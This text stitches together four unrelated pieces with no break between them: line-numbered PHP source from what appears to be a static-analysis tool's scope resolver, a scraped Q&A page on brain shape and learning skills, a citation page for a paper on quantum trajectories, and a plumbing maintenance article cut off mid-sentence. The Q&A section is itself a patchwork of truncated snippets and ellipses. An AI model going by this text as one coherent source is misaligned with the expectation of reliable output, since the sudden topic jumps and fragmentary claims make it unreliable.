3424: $offsetValueType = $offsetValueType->getOffsetValueType($offsetType); 3425: if ($offsetValueType instanceof ErrorType) { 3426: $offsetValueType = new ConstantArrayType([], []); 3427: } 3428: } 3429: 3430: $offsetValueTypeStack[] = $offsetValueType; 3431: } 3432: 3433: foreach (array_reverse($offsetTypes) as $i => $offsetType) { 3434: /** @var Type $offsetValueType */ 3435: $offsetValueType = array_pop($offsetValueTypeStack); 3436: if (!$offsetValueType instanceof MixedType) { 3437: $types = [ 3438: new ArrayType(new MixedType(), new MixedType()), 3439: new ObjectType(ArrayAccess::class), 3440: new NullType(), 3441: ]; 3442: if ($offsetType !== null && (new IntegerType())->isSuperTypeOf($offsetType)->yes()) { 3443: $types[] = new StringType(); 3444: } 3445: $offsetValueType = TypeCombinator::intersect($offsetValueType, TypeCombinator::union(...$types)); 3446: } 3447: $valueToWrite = $offsetValueType->setOffsetValueType($offsetType, $valueToWrite, $i === 0); 3448: } 3449: 3450: if ($varType->isArray()->yes() || !(new ObjectType(ArrayAccess::class))->isSuperTypeOf($varType)->yes()) { 3451: if ($var instanceof Variable && is_string($var->name)) { 3452: $scope = $scope->assignVariable($var->name, $valueToWrite); 3453: } else { 3454: if ($var instanceof PropertyFetch || $var instanceof StaticPropertyFetch) { 3455: $nodeCallback(new PropertyAssignNode($var, $assignedPropertyExpr, $isAssignOp), $scope); 3456: } 3457: $scope = $scope->assignExpression( 3458: $var, 3459: $valueToWrite, 3460: ); 3461: } 3462: 3463: if ($originalVar->dim instanceof Variable || $originalVar->dim instanceof Node\Scalar) { 3464: $currentVarType = $scope->getType($originalVar); 3465: if (!$originalValueToWrite->isSuperTypeOf($currentVarType)->yes()) { 3466: $scope = $scope->assignExpression( 3467: $originalVar, 3468: $originalValueToWrite, 3469: ); 3470: } 3471: } 3472: } else { 3473: if ($var instanceof PropertyFetch || $var instanceof StaticPropertyFetch) { 3474: $nodeCallback(new PropertyAssignNode($var, $assignedPropertyExpr, $isAssignOp), $scope); 3475: } 3476: } 3477: 3478: if (!$varType->isArray()->yes() && !(new ObjectType(ArrayAccess::class))->isSuperTypeOf($varType)->no()) { 3479: $throwPoints = array_merge($throwPoints, $this->processExprNode( 3480: new MethodCall($var, 'offsetSet'), 3481: $scope, 3482: static function (): void { 3483: }, 3484: $context, 3485: )->getThrowPoints()); 3486: } 3487: } elseif ($var instanceof PropertyFetch) { 3488: $objectResult = $this->processExprNode($var->var, $scope, $nodeCallback, $context); 3489: $hasYield = $objectResult->hasYield(); 3490: $throwPoints = $objectResult->getThrowPoints(); 3491: $scope = $objectResult->getScope(); 3492: 3493: $propertyName = null; 3494: if ($var->name instanceof Node\Identifier) { 3495: $propertyName = $var->name->name; 3496: } else { 3497: $propertyNameResult = $this->processExprNode($var->name, $scope, $nodeCallback, $context); 3498: $hasYield = $hasYield || $propertyNameResult->hasYield(); 3499: $throwPoints = array_merge($throwPoints, $propertyNameResult->getThrowPoints()); 3500: $scope = $propertyNameResult->getScope(); 3501: } 3502: 3503: $result = $processExprCallback($scope); 3504: $hasYield = $hasYield || $result->hasYield(); 3505: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 3506: $scope = $result->getScope(); 3507: 3508: $propertyHolderType = $scope->getType($var->var); 3509: if ($propertyName !== null && $propertyHolderType->hasProperty($propertyName)->yes()) { 3510: $propertyReflection = $propertyHolderType->getProperty($propertyName, $scope); 3511: $assignedExprType = $scope->getType($assignedExpr); 3512: $nodeCallback(new PropertyAssignNode($var, $assignedExpr, $isAssignOp), $scope); 3513: if ($propertyReflection->canChangeTypeAfterAssignment()) { 3514: $scope = $scope->assignExpression($var, $assignedExprType); 3515: } 3516: $declaringClass = $propertyReflection->getDeclaringClass(); 3517: if ( 3518: $declaringClass->hasNativeProperty($propertyName) 3519: && !$declaringClass->getNativeProperty($propertyName)->getNativeType()->accepts($assignedExprType, true)->yes() 3520: ) { 3521: $throwPoints[] = ThrowPoint::createExplicit($scope, new ObjectType(TypeError::class), $assignedExpr, false); 3522: } 3523: } else { 3524: // fallback 3525: $assignedExprType = $scope->getType($assignedExpr); 3526: $nodeCallback(new PropertyAssignNode($var, $assignedExpr, $isAssignOp), $scope); 3527: $scope = $scope->assignExpression($var, $assignedExprType); 3528: // simulate dynamic property assign by __set to get throw points 3529: if (!$propertyHolderType->hasMethod('__set')->no()) { 3530: $throwPoints = array_merge($throwPoints, $this->processExprNode( 3531: new MethodCall($var->var, '__set'), 3532: $scope, 3533: static function (): void { 3534: }, 3535: $context, 3536: )->getThrowPoints()); 3537: } 3538: } 3539: 3540: } elseif ($var instanceof Expr\StaticPropertyFetch) { 3541: if ($var->class instanceof Node\Name) { 3542: $propertyHolderType = $scope->resolveTypeByName($var->class); 3543: } else { 3544: $this->processExprNode($var->class, $scope, $nodeCallback, $context); 3545: $propertyHolderType = $scope->getType($var->class); 3546: } 3547: 3548: $propertyName = null; 3549: if ($var->name instanceof Node\Identifier) { 3550: $propertyName = $var->name->name; 3551: $hasYield = false; 3552: $throwPoints = []; 3553: } else { 3554: $propertyNameResult = $this->processExprNode($var->name, $scope, $nodeCallback, $context); 3555: $hasYield = $propertyNameResult->hasYield(); 3556: $throwPoints = $propertyNameResult->getThrowPoints(); 3557: $scope = $propertyNameResult->getScope(); 3558: } 3559: 3560: $result = $processExprCallback($scope); 3561: $hasYield = $hasYield || $result->hasYield(); 3562: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 3563: $scope = $result->getScope(); 3564: 3565: if ($propertyName !== null) { 3566: $propertyReflection = $scope->getPropertyReflection($propertyHolderType, $propertyName); 3567: $assignedExprType = $scope->getType($assignedExpr); 3568: $nodeCallback(new PropertyAssignNode($var, $assignedExpr, $isAssignOp), $scope); 3569: if ($propertyReflection !== null && $propertyReflection->canChangeTypeAfterAssignment()) { 3570: $scope = $scope->assignExpression($var, $assignedExprType); 3571: } 3572: } else { 3573: // fallback 3574: $assignedExprType = $scope->getType($assignedExpr); 3575: $nodeCallback(new PropertyAssignNode($var, $assignedExpr, $isAssignOp), $scope); 3576: $scope = $scope->assignExpression($var, $assignedExprType); 3577: } 3578: } elseif ($var instanceof List_ || $var instanceof Array_) { 3579: $result = $processExprCallback($scope); 3580: $hasYield = $result->hasYield(); 3581: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 3582: $scope = $result->getScope(); 3583: foreach ($var->items as $i => $arrayItem) { 3584: if ($arrayItem === null) { 3585: continue; 3586: } 3587: 3588: $itemScope = $scope; 3589: if ($enterExpressionAssign) { 3590: $itemScope = $itemScope->enterExpressionAssign($arrayItem->value); 3591: } 3592: $itemScope = $this->lookForSetAllowedUndefinedExpressions($itemScope, $arrayItem->value); 3593: $itemResult = $this->processExprNode($arrayItem, $itemScope, $nodeCallback, $context->enterDeep()); 3594: $hasYield = $hasYield || $itemResult->hasYield(); 3595: $throwPoints = array_merge($throwPoints, $itemResult->getThrowPoints()); 3596: 3597: if ($arrayItem->key === null) { 3598: $dimExpr = new Node\Scalar\LNumber($i); 3599: } else { 3600: $dimExpr = $arrayItem->key; 3601: } 3602: $result = $this->processAssignVar( 3603: $scope, 3604: $arrayItem->value, 3605: new GetOffsetValueTypeExpr($assignedExpr, $dimExpr), 3606: $nodeCallback, 3607: $context, 3608: static fn (MutatingScope $scope): ExpressionResult => new ExpressionResult($scope, false, []), 3609: $enterExpressionAssign, 3610: ); 3611: $scope = $result->getScope(); 3612: $hasYield = $hasYield || $result->hasYield(); 3613: $throwPoints = array_merge($throwPoints, $result->getThrowPoints()); 3614: } 3615: } 3616: 3617: return new ExpressionResult($scope, $hasYield, $throwPoints); 3618: } 3619: 3620: private function unwrapAssign(Expr $expr): Expr 3621: { 3622: if ($expr instanceof Assign) { 3623: return $this->unwrapAssign($expr->expr); 3624: } 3625: 3626: return $expr; 3627: } 3628: 3629: /** 3630: * @param array<string, ConditionalExpressionHolder[]> $conditionalExpressions 3631: * @return array<string, ConditionalExpressionHolder[]> 3632: */ 3633: private function processSureTypesForConditionalExpressionsAfterAssign(Scope $scope, string $variableName, array $conditionalExpressions, SpecifiedTypes $specifiedTypes, Type $variableType): array 3634: { 3635: foreach ($specifiedTypes->getSureTypes() as $exprString => [$expr, $exprType]) { 3636: if (!$expr instanceof Variable) { 3637: continue; 3638: } 3639: if (!is_string($expr->name)) { 3640: continue; 3641: } 3642: 3643: if (!isset($conditionalExpressions[$exprString])) { 3644: $conditionalExpressions[$exprString] = []; 3645: } 3646: 3647: $holder = new ConditionalExpressionHolder([ 3648: '$' . $variableName => $variableType, 3649: ], VariableTypeHolder::createYes( 3650: TypeCombinator::intersect($scope->getType($expr), $exprType), 3651: )); 3652: $conditionalExpressions[$exprString][$holder->getKey()] = $holder; 3653: } 3654: 3655: return $conditionalExpressions; 3656: } 3657: 3658: /** 3659: * @param array<string, ConditionalExpressionHolder[]> $conditionalExpressions 3660: * @return array<string, ConditionalExpressionHolder[]> 3661: */ 3662: private function processSureNotTypesForConditionalExpressionsAfterAssign(Scope $scope, string $variableName, array $conditionalExpressions, SpecifiedTypes $specifiedTypes, Type $variableType): array 3663: { 3664: foreach ($specifiedTypes->getSureNotTypes() as $exprString => [$expr, $exprType]) { 3665: if (!$expr instanceof Variable) { 3666: continue; 3667: } 3668: if (!is_string($expr->name)) { 3669: continue; 3670: } 3671: 3672: if (!isset($conditionalExpressions[$exprString])) { 3673: $conditionalExpressions[$exprString] = []; 3674: } 3675: 3676: $holder = new ConditionalExpressionHolder([ 3677: '$' . $variableName => $variableType, 3678: ], VariableTypeHolder::createYes( 3679: TypeCombinator::remove($scope->getType($expr), $exprType), 3680: )); 3681: $conditionalExpressions[$exprString][$holder->getKey()] = $holder; 3682: } 3683: 3684: return $conditionalExpressions; 3685: } 3686: 3687: private function processStmtVarAnnotation(MutatingScope $scope, Node\Stmt $stmt, ?Expr $defaultExpr): MutatingScope 3688: { 3689: $function = $scope->getFunction(); 3690: $variableLessTags = []; 3691: 3692: foreach ($stmt->getComments() as $comment) { 3693: if (!$comment instanceof Doc) { 3694: continue; 3695: } 3696: 3697: $resolvedPhpDoc = $this->fileTypeMapper->getResolvedPhpDoc( 3698: $scope->getFile(), 3699: $scope->isInClass() ? $scope->getClassReflection()->getName() : null, 3700: $scope->isInTrait() ? $scope->getTraitReflection()->getName() : null, 3701: $function !== null ? $function->getName() : null, 3702: $comment->getText(), 3703: ); 3704: 3705: $assignedVariable = null; 3706: if ( 3707: $stmt instanceof Node\Stmt\Expression 3708: && ($stmt->expr instanceof Assign || $stmt->expr instanceof AssignRef) 3709: && $stmt->expr->var instanceof Variable 3710: && is_string($stmt->expr->var->name) 3711: ) { 3712: $assignedVariable = $stmt->expr->var->name; 3713: } 3714: 3715: foreach ($resolvedPhpDoc->getVarTags() as $name => $varTag) { 3716: if (is_int($name)) { 3717: $variableLessTags[] = $varTag; 3718: continue; 3719: } 3720: 3721: if ($name === $assignedVariable) { 3722: continue; 3723: } 3724: 3725: $certainty = $scope->hasVariableType($name); 3726: if ($certainty->no()) { 3727: continue; 3728: } 3729: 3730: if ($scope->isInClass() && $scope->getFunction() === null) { 3731: continue; 3732: } 3733: 3734: if ($scope->canAnyVariableExist()) { 3735: $certainty = TrinaryLogic::createYes(); 3736: } 3737: 3738: $scope = $scope->assignVariable($name, $varTag->getType(), $certainty); 3739: } 3740: } 3741: 3742: if (count($variableLessTags) === 1 && $defaultExpr !== null) { 3743: $scope = $scope->assignExpression($defaultExpr, $variableLessTags[0]->getType()); 3744: } 3745: 3746: return $scope; 3747: } 3748: 3749: /** 3750: * @param array<int, string> $variableNames 3751: */ 3752: private function processVarAnnotation(MutatingScope $scope, array $variableNames, Node $node, bool &$changed = false): MutatingScope 3753: { 3754: $function = $scope->getFunction(); 3755: $varTags = []; 3756: foreach ($node->getComments() as $comment) { 3757: if (!$comment instanceof Doc) { 3758: continue; 3759: } 3760: 3761: $resolvedPhpDoc = $this->fileTypeMapper->getResolvedPhpDoc( 3762: $scope->getFile(), 3763: $scope->isInClass() ? $scope->getClassReflection()->getName() : null, 3764: $scope->isInTrait() ? $scope->getTraitReflection()->getName() : null, 3765: $function !== null ? $function->getName() : null, 3766: $comment->getText(), 3767: ); 3768: foreach ($resolvedPhpDoc->getVarTags() as $key => $varTag) { 3769: $varTags[$key] = $varTag; 3770: } 3771: } 3772: 3773: if (count($varTags) === 0) { 3774: return $scope; 3775: } 3776: 3777: foreach ($variableNames as $variableName) { 3778: if (!isset($varTags[$variableName])) { 3779: continue; 3780: } 3781: 3782: $variableType = $varTags[$variableName]->getType(); 3783: $changed = true; 3784: $scope = $scope->assignVariable($variableName, $variableType); 3785: } 3786: 3787: if (count($variableNames) === 1 && count($varTags) === 1 && isset($varTags[0])) { 3788: $variableType = $varTags[0]->getType(); 3789: $changed = true; 3790: $scope = $scope->assignVariable($variableNames[0], $variableType); 3791: } 3792: 3793: return $scope; 3794: } 3795: 3796: private function enterForeach(MutatingScope $scope, Foreach_ $stmt): MutatingScope 3797: { 3798: if ($stmt->expr instanceof Variable && is_string($stmt->expr->name)) { 3799: $scope = $this->processVarAnnotation($scope, [$stmt->expr->name], $stmt); 3800: } 3801: $iterateeType = $scope->getType($stmt->expr); 3802: if ( 3803: ($stmt->valueVar instanceof Variable && is_string($stmt->valueVar->name)) 3804: && ($stmt->keyVar === null || ($stmt->keyVar instanceof Variable && is_string($stmt->keyVar->name))) 3805: ) { 3806: $keyVarName = null; 3807: if ($stmt->keyVar instanceof Variable && is_string($stmt->keyVar->name)) { 3808: $keyVarName = $stmt->keyVar->name; 3809: } 3810: $scope = $scope->enterForeach( 3811: $stmt->expr, 3812: $stmt->valueVar->name, 3813: $keyVarName, 3814: ); 3815: $vars = [$stmt->valueVar->name]; 3816: if ($keyVarName !== null) { 3817: $vars[] = $keyVarName; 3818: } 3819: } else { 3820: $scope = $this->processAssignVar( 3821: $scope, 3822: $stmt->valueVar, 3823: new GetIterableValueTypeExpr($stmt->expr), 3824: static function (): void { 3825: }, 3826: ExpressionContext::createDeep(), 3827: static fn (MutatingScope $scope): ExpressionResult => new ExpressionResult($scope, false, []), 3828: true, 3829: )->getScope(); 3830: $vars = $this->getAssignedVariables($stmt->valueVar); 3831: if ( 3832: $stmt->keyVar instanceof Variable && is_string($stmt->keyVar->name) 3833: ) { 3834: $scope = $scope->enterForeachKey($stmt->expr, $stmt->keyVar->name); 3835: $vars[] = $stmt->keyVar->name; 3836: } elseif ($stmt->keyVar !== null) { 3837: $scope = $this->processAssignVar( 3838: $scope, 3839: $stmt->keyVar, 3840: new GetIterableKeyTypeExpr($stmt->expr), 3841: static function (): void { 3842: }, 3843: ExpressionContext::createDeep(), 3844: static fn (MutatingScope $scope): ExpressionResult => new ExpressionResult($scope, false, []), 3845: true, 3846: )->getScope(); 3847: $vars = array_merge($vars, $this->getAssignedVariables($stmt->keyVar)); 3848: } 3849: } 3850: 3851: if ( 3852: $stmt->getDocComment() === null 3853: && $iterateeType instanceof ConstantArrayType 3854: && $stmt->valueVar instanceof Variable && is_string($stmt->valueVar->name) 3855: && $stmt->keyVar instanceof Variable && is_string($stmt->keyVar->name) 3856: ) { 3857: $conditionalHolders = []; 3858: foreach ($iterateeType->getKeyTypes() as $i => $keyType) { 3859: $valueType = $iterateeType->getValueTypes()[$i]; 3860: $holder = new ConditionalExpressionHolder([ 3861: '$' . $stmt->keyVar->name => $keyType, 3862: ], new VariableTypeHolder($valueType, TrinaryLogic::createYes())); 3863: $conditionalHolders[$holder->getKey()] = $holder; 3864: } 3865: 3866: $scope = $scope->addConditionalExpressions( 3867: '$' . $stmt->valueVar->name, 3868: $conditionalHolders, 3869: ); 3870: } 3871: 3872: return $this->processVarAnnotation($scope, $vars, $stmt); 3873: } 3874: 3875: /** 3876: * @param callable(Node $node, Scope $scope): void $nodeCallback 3877: */ 3878: private function processTraitUse(Node\Stmt\TraitUse $node, MutatingScope $classScope, callable $nodeCallback): void 3879: { 3880: $parentTraitNames = []; 3881: $parent = $classScope->getParentScope(); 3882: while ($parent !== null) { 3883: if ($parent->isInTrait()) { 3884: $parentTraitNames[] = $parent->getTraitReflection()->getName(); 3885: } 3886: $parent = $parent->getParentScope(); 3887: } 3888: 3889: foreach ($node->traits as $trait) { 3890: $traitName = (string) $trait; 3891: if (in_array($traitName, $parentTraitNames, true)) { 3892: continue; 3893: } 3894: if (!$this->reflectionProvider->hasClass($traitName)) { 3895: continue; 3896: } 3897: $traitReflection = $this->reflectionProvider->getClass($traitName); 3898: $traitFileName = $traitReflection->getFileName(); 3899: if ($traitFileName === null) { 3900: continue; // trait from eval or from PHP itself 3901: } 3902: $fileName = $this->fileHelper->normalizePath($traitFileName); 3903: if (!isset($this->analysedFiles[$fileName])) { 3904: continue; 3905: } 3906: $parserNodes = $this->parser->parseFile($fileName); 3907: $this->processNodesForTraitUse($parserNodes, $traitReflection, $classScope, $node->adaptations, $nodeCallback); 3908: } 3909: } 3910: 3911: /** 3912: * @param Node[]|Node|scalar $node 3913: * @param Node\Stmt\TraitUseAdaptation[] $adaptations 3914: * @param callable(Node $node, Scope $scope): void $nodeCallback 3915: */ 3916: private function processNodesForTraitUse($node, ClassReflection $traitReflection, MutatingScope $scope, array $adaptations, callable $nodeCallback): void 3917: { 3918: if ($node instanceof Node) { 3919: if ($node instanceof Node\Stmt\Trait_ && $traitReflection->getName() === (string) $node->namespacedName && $traitReflection->getNativeReflection()->getStartLine() === $node->getStartLine()) { 3920: $methodModifiers = []; 3921: foreach ($adaptations as $adaptation) { 3922: if (!$adaptation instanceof Node\Stmt\TraitUseAdaptation\Alias) { 3923: continue; 3924: } 3925: 3926: if ($adaptation->newModifier === null) { 3927: continue; 3928: } 3929: 3930: $methodModifiers[$adaptation->method->toLowerString()] = $adaptation->newModifier; 3931: } 3932: 3933: $stmts = $node->stmts; 3934: foreach ($stmts as $i => $stmt) { 3935: if (!$stmt instanceof Node\Stmt\ClassMethod) { 3936: continue; 3937: } 3938: $methodName = $stmt->name->toLowerString(); 3939: if (!array_key_exists($methodName, $methodModifiers)) { 3940: continue; 3941: } 3942: 3943: $methodAst = clone $stmt; 3944: $methodAst->flags = ($methodAst->flags & ~ Node\Stmt\Class_::VISIBILITY_MODIFIER_MASK) | $methodModifiers[$methodName]; 3945: $stmts[$i] = $methodAst; 3946: } 3947: $this->processStmtNodes($node, $stmts, $scope->enterTrait($traitReflection), $nodeCallback); 3948: return; 3949: } 3950: if ($node instanceof Node\Stmt\ClassLike) { 3951: return; 3952: } 3953: if ($node instanceof Node\FunctionLike) { 3954: return; 3955: } 3956: foreach ($node->getSubNodeNames() as $subNodeName) { 3957: $subNode = $node->{$subNodeName}; 3958: $this->processNodesForTraitUse($subNode, $traitReflection, $scope, $adaptations, $nodeCallback); 3959: } 3960: } elseif (is_array($node)) { 3961: foreach ($node as $subNode) { 3962: $this->processNodesForTraitUse($subNode, $traitReflection, $scope, $adaptations, $nodeCallback); 3963: } 3964: } 3965: } 3966: 3967: /** 3968: * @return array{TemplateTypeMap, Type[], ?Type, ?Type, ?string, bool, bool, bool, bool|null, bool, bool, string|null} 3969: */ 3970: public function getPhpDocs(Scope $scope, Node\FunctionLike|Node\Stmt\Property $node): array 3971: { 3972: $templateTypeMap = TemplateTypeMap::createEmpty(); 3973: $phpDocParameterTypes = []; 3974: $phpDocReturnType = null; 3975: $phpDocThrowType = null; 3976: $deprecatedDescription = null; 3977: $isDeprecated = false; 3978: $isInternal = false; 3979: $isFinal = false; 3980: $isPure = false; 3981: $acceptsNamedArguments = true; 3982: $isReadOnly = $scope->isInClass() && $scope->getClassReflection()->isImmutable(); 3983: $docComment = $node->getDocComment() !== null 3984: ? $node->getDocComment()->getText() 3985: : null; 3986: 3987: $file = $scope->getFile(); 3988: $class = $scope->isInClass() ? $scope->getClassReflection()->getName() : null; 3989: $trait = $scope->isInTrait() ? $scope->getTraitReflection()->getName() : null; 3990: $resolvedPhpDoc = null; 3991: $functionName = null; 3992: 3993: if ($node instanceof Node\Stmt\ClassMethod) { 3994: if (!$scope->isInClass()) { 3995: throw new ShouldNotHappenException(); 3996: } 3997: $functionName = $node->name->name; 3998: $positionalParameterNames = array_map(static function (Node\Param $param): string { 3999: if (!$param->var instanceof Variable || !is_string($param->var->name)) { 4000: throw new ShouldNotHappenException(); 4001: } 4002: 4003: return $param->var->name; 4004: }, $node->getParams()); 4005: $resolvedPhpDoc = $this->phpDocInheritanceResolver->resolvePhpDocForMethod( 4006: $docComment, 4007: $file, 4008: $scope->getClassReflection(), 4009: $trait, 4010: $node->name->name, 4011: $positionalParameterNames, 4012: ); 4013: 4014: if ($node->name->toLowerString() === '__construct') { 4015: foreach ($node->params as $param) { 4016: if ($param->flags === 0) { 4017: continue; 4018: } 4019: 4020: if ($param->getDocComment() === null) { 4021: continue; 4022: } 4023: 4024: if ( 4025: !$param->var instanceof Variable 4026: || !is_string($param->var->name) 4027: ) { 4028: throw new ShouldNotHappenException(); 4029: } 4030: 4031: $paramPhpDoc = $this->fileTypeMapper->getResolvedPhpDoc( 4032: $file, 4033: $class, 4034: $trait, 4035: '__construct', 4036: $param->getDocComment()->getText(), 4037: ); 4038: $varTags = $paramPhpDoc->getVarTags(); 4039: if (isset($varTags[0]) && count($varTags) === 1) { 4040: $phpDocType = $varTags[0]->getType(); 4041: } elseif (isset($varTags[$param->var->name])) { 4042: $phpDocType = $varTags[$param->var->name]->getType(); 4043: } else { 4044: continue; 4045: } 4046: 4047: $phpDocParameterTypes[$param->var->name] = $phpDocType; 4048: } 4049: } 4050: } elseif ($node instanceof Node\Stmt\Function_) { 4051: $functionName = trim($scope->getNamespace() . '\\' . $node->name->name, '\\'); 4052: } 4053: 4054: if ($docComment !== null && $resolvedPhpDoc === null) { 4055: $resolvedPhpDoc = $this->fileTypeMapper->getResolvedPhpDoc( 4056: $file, 4057: $class, 4058: $trait, 4059: $functionName, 4060: $docComment, 4061: ); 4062: } 4063: 4064: if ($resolvedPhpDoc !== null) { 4065: $templateTypeMap = $resolvedPhpDoc->getTemplateTypeMap(); 4066: foreach ($resolvedPhpDoc->getParamTags() as $paramName => $paramTag) { 4067: if (array_key_exists($paramName, $phpDocParameterTypes)) { 4068: continue; 4069: } 4070: $paramType = $paramTag->getType(); 4071: if ($scope->isInClass()) { 4072: $paramType = $this->transformStaticType($scope->getClassReflection(), $paramType); 4073: } 4074: $phpDocParameterTypes[$paramName] = $paramType; 4075: } 4076: if ($node instanceof Node\FunctionLike) { 4077: $nativeReturnType = $scope->getFunctionType($node->getReturnType(), false, false); 4078: $phpDocReturnType = $this->getPhpDocReturnType($resolvedPhpDoc, $nativeReturnType); 4079: if ($phpDocReturnType !== null && $scope->isInClass()) { 4080: $phpDocReturnType = $this->transformStaticType($scope->getClassReflection(), $phpDocReturnType); 4081: } 4082: } 4083: $phpDocThrowType = $resolvedPhpDoc->getThrowsTag() !== null ? $resolvedPhpDoc->getThrowsTag()->getType() : null; 4084: $deprecatedDescription = $resolvedPhpDoc->getDeprecatedTag() !== null ? $resolvedPhpDoc->getDeprecatedTag()->getMessage() : null; 4085: $isDeprecated = $resolvedPhpDoc->isDeprecated(); 4086: $isInternal = $resolvedPhpDoc->isInternal(); 4087: $isFinal = $resolvedPhpDoc->isFinal(); 4088: $isPure = $resolvedPhpDoc->isPure(); 4089: $acceptsNamedArguments = $resolvedPhpDoc->acceptsNamedArguments(); 4090: $isReadOnly = $isReadOnly || $resolvedPhpDoc->isReadOnly(); 4091: } 4092: 4093: return [$templateTypeMap, $phpDocParameterTypes, $phpDocReturnType, $phpDocThrowType, $deprecatedDescription, $isDeprecated, $isInternal, $isFinal, $isPure, $acceptsNamedArguments, $isReadOnly, $docComment]; 4094: } 4095: 4096: private function transformStaticType(ClassReflection $declaringClass, Type $type): Type 4097: { 4098: return TypeTraverser::map($type, static function (Type $type, callable $traverse) use ($declaringClass): Type { 4099: if ($type instanceof StaticType) { 4100: $changedType = $type->changeBaseClass($declaringClass); 4101: if ($declaringClass->isFinal()) { 4102: $changedType = $changedType->getStaticObjectType(); 4103: } 4104: return $traverse($changedType); 4105: } 4106: 4107: return $traverse($type); 4108: }); 4109: } 4110: 4111: private function getPhpDocReturnType(ResolvedPhpDocBlock $resolvedPhpDoc, Type $nativeReturnType): ?Type 4112: { 4113: $returnTag = $resolvedPhpDoc->getReturnTag(); 4114: 4115: if ($returnTag === null) { 4116: return null; 4117: } 4118: 4119: $phpDocReturnType = $returnTag->getType(); 4120: 4121: if ($returnTag->isExplicit()) { 4122: return $phpDocReturnType; 4123: } 4124: 4125: if ($nativeReturnType->isSuperTypeOf(TemplateTypeHelper::resolveToBounds($phpDocReturnType))->yes()) { 4126: return $phpDocReturnType; 4127: } 4128: 4129: return null; 4130: } 4131: 4132: } 4133:
adplus-dvertising Why is the brain shaped like it is? Table of contents: 1. Why is the brain shaped like it is? 2. How does the brain make new connections? 3. How does learning new things affect the brain? 4. How can I develop new skills? 5. Why is learning healthy? 6. What is a good skill to learn? 7. What can I learn in one minute? Why is the brain shaped like it is? “This neural tube is made up of a single layer of neural stem cells that go through a rapid and highly orchestrated process of expansion and differentiation, giving rise to all of the neurons in the brain. ... So essentially, the brain starts off as a similar shape for creatures with spinal cords. How does the brain make new connections? Each neuron has a shape a little like that of a tree, and is covered in branches called dendrites. Synapses typically form between the end of one neuron and a dendrite on another. Most scientists believe that the brain forms new memories by changing the strength of these synapses. How does learning new things affect the brain? Learning anything new. On a physiological level, learning new things is good for your brain. ... Additionally, learning new skills stimulates neurons in the brain, which forms more neural pathways and allows electrical impulses to travel faster across them. The combination of these two things helps you learn better. How can I develop new skills? 5 methods & benefits 1. On‑the‑job training. On‑the‑job training is a great way to acquire and master new skills without even having to leave the workplace. ... 2. Training courses & workshops. ... 3. E-learning. ... 4. Webinars & YouTube. ... 5. Blogs & books. ... 6. Create a schedule with fixed study times. ... 7. Get feedback. ... 8. Start with core skills. Why is learning healthy? Lifelong learning and the learning of new skills is vital to brain health. Studies have shown that to benefit your brain the most, as you age, you must participate in things that keep your mind engaged and challenge the way you think. ... An active mind throughout your life can help you live longer and healthier. What is a good skill to learn? General Skills to Learn (The FUN and USEFUL Skills) • Speed Reading. ... • Speak a New Language. ... • Basic Home Repairs. ... • Learn How to Draw. ... • Basic Car Repairs. ... • Organize and Declutter Your Home. ... • Master Photoshop. ... • Play the Guitar. What can I learn in one minute? 10 Awesome Life Hacks You Can Learn in Just One Minute • How to avoid sending an e-mail to the wrong recipient. ... • How to not forget to take medication. ... • How to see without glasses if you have bad vision. ... • How to test battery life. ... • How to get rid of onion or garlic smell from your hands. ... • How to prevent yourself from crying in public. ... • How to apologize the right way.
Quantum Trajectories: Dirac, Moyal and Bohm @article{Hiley2019QuantumTD, title={Quantum Trajectories: Dirac, Moyal and Bohm}, author={Basil J. Hiley and Maurice A. de Gosson and Glen Dennis}, journal={Quanta}, year={2019} } We recall Dirac's early proposals to develop a description of quantum phenomena in terms of a non-commutative algebra in which he suggested a way to construct what he called quantum trajectories. Generalising these ideas, we show how they are related to weak values and explore their use in the experimental construction of quantum trajectories. We discuss covering spaces which play an essential role in accounting for the wave properties of quantum particles. We briefly point out how new…  1 Citations Observability, Unobservability and the Copenhagen Interpretation in Dirac's Methodology of Physics Paul Dirac has been undoubtedly one of the central figures of the last century physics, contributing in several and remarkable ways to the development of quantum mechanics; he was also at the centre References SHOWING 1-10 OF 83 REFERENCES Bohm's quantum potential as an internal energy Paths of Canonical Transformations and their Quantization In their simplest formulations, classical dynamics is the study of Hamiltonian flows and quantum mechanics that of propagators. Both are linked, and emerge from the datum of a single classical Fermi's ansatz and Bohm's quantum potential On the Relationship between the Moyal Algebra and the Quantum Operator Algebra of von Neumann The primary motivation for Moyal's approach to quantum mechanics was to develop a phase space formalism for quantum phenomena by generalising the techniques of classical probability theory. To this Clifford Algebras and the Dirac-Bohm Quantum Hamilton-Jacobi Equation In this paper we show how the dynamics of the Schrödinger, Pauli and Dirac particles can be described in a hierarchy of Clifford algebras, ${\mathcal{C}}_{1,3}, {\mathcal{C}}_{3,0}$, and The Quantum Theory of Motion: An Account of the de Broglie-Bohm Causal Interpretation of Quantum Mechanics 1. Quantum mechanics and its interpretation 2. Hamilton-Jacobi theory 3. Elements of the quantum theory of motion 4. Simple applications 5. Interference and tunnelling 6. The classical limit 7. The Algebraic Way In this paper we examine in detail the non-commutative symplectic algebra underlying quantum dynamics. We show that this algebra contains both the Weyl-von Neumann algebra and the Moyal algebra. The Imprints of the Quantum World in Classical Mechanics The imprints left by quantum mechanics in classical (Hamiltonian) mechanics are much more numerous than is usually believed. We show that the Schrödinger equation for a nonrelativistic spinless On the relationship between the Wigner–Moyal approach and the quantum operator algebra of von Neumann In this paper we discuss the close relationship between the Wigner–Moyal algebra and the original non-commutative quantum algebra introduced by von Neumann in 1931. We show that the “distribution ... ...
Reducing The Effects Of Broken Pipes THINGS YOU SHOULD KNOW ABOUT PLUMBING Plumbing is often one of the most overlooked systems both in high-rise buildings and residential apartment blocks. Fixing a leaky faucet or a running toilet in your own house is one thing, but if you own a company that operates in the property management sector, plumbing issues can have grave effects both from a financial and business standpoint. Whether you manage schools, office building, apartment blocks or healthcare facilities, you will not be spared by the occasional plumbing issue occurring and filling your inbox with complaints. And for good reason – faulty plumbing systems can affect the property in many ways, from permeating the building with unpleasant smells, helping mold develop in certain places by creating moisture, to degrading the overall structural integrity of the building. Automatic Leaks Detector Taps, sinks, pipes, and other items may not last forever and may eventually weaken and start leaking. Some property managers let pipes stay for long after they have proven in disrepair, so eventually installing new ones at some point is essential. Assess the damages that the pipes and sinks have suffered and, if the situation calls of it, replace them with brand new ones. From a business standpoint, it is cheaper to replace old pipes than completely renovating the interior in the aftermath of a water-related accident. You can ask a professional 